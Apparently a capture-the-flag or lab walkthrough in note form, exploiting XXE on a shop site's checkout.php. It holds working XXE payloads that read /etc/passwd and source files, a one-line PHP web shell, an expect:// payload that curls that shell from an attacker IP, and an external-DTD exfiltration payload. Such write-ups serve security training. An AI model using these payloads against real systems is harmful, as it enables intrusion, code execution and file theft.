## `shopdev2.inlanefeight.local`
- visit page ![[images/Pasted image 20260630090210.png]]
- we get in with `admin:admin` ![[images/Pasted image 20260630090247.png]]
- `/checkout.php` submits an xml based POST request with an id number ![[images/Pasted image 20260630090643.png]]
- whatever I place in the userid field shows up in the response ![[images/Pasted image 20260630090943.png]]
- try to add xml code > confirmed XXE ![[images/Pasted image 20260630091125.png]]
```xml
<!DOCTYPE email [
<!ENTITY company "Inlane Freight">
]>
```
## XXE
- try to read a file
- able to read `/etc/passwd` > we still see that only `root` has a login shell ![[images/Pasted image 20260630091305.png]]
```xml
<!DOCTYPE email [
<!ENTITY company SYSTEM "file:///etc/passwd">
]>
```
- let's pull `index.php` ![[images/Pasted image 20260630092032.png]]
```xml
<!DOCTYPE email [
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
```
## RCE with XXE
- first create `shell.php` then host via HTTP ![[images/Pasted image 20260630092622.png]]
```bash
echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
```
- now use `expect` to `curl shell.php` from Kali http server ![[images/Pasted image 20260630092903.png]]
```xml
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'10.10.15.114:8000/shell.php'">
]>
```
- try to hit `shell.php`
- not getting a hit on http server
- try switching to `wget`
- still nothing
## CDATA exfil
- xml payload
```xml
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!-- reference external file -->
<!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
<!ENTITY % xxe SYSTEM "http://10.10.15.114:8000/xxe.dtd"> <!-- reference our external DTD -->
%xxe;
]>
```
- create `xxe.dtd` file on Kali and host via http
- here we are able to hit the http server
```bash
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
python3 -m http.server 8000
```
![[images/Pasted image 20260630100112.png]]
## read flag
- update xml payload as below substituting `email` for `userid` as that is the variable we are using for XXE
```xml
<!DOCTYPE userid [
<!ENTITY company SYSTEM "file:///flag.txt">
]>
```
- that's the ticket ![[images/Pasted image 20260630170456.png]]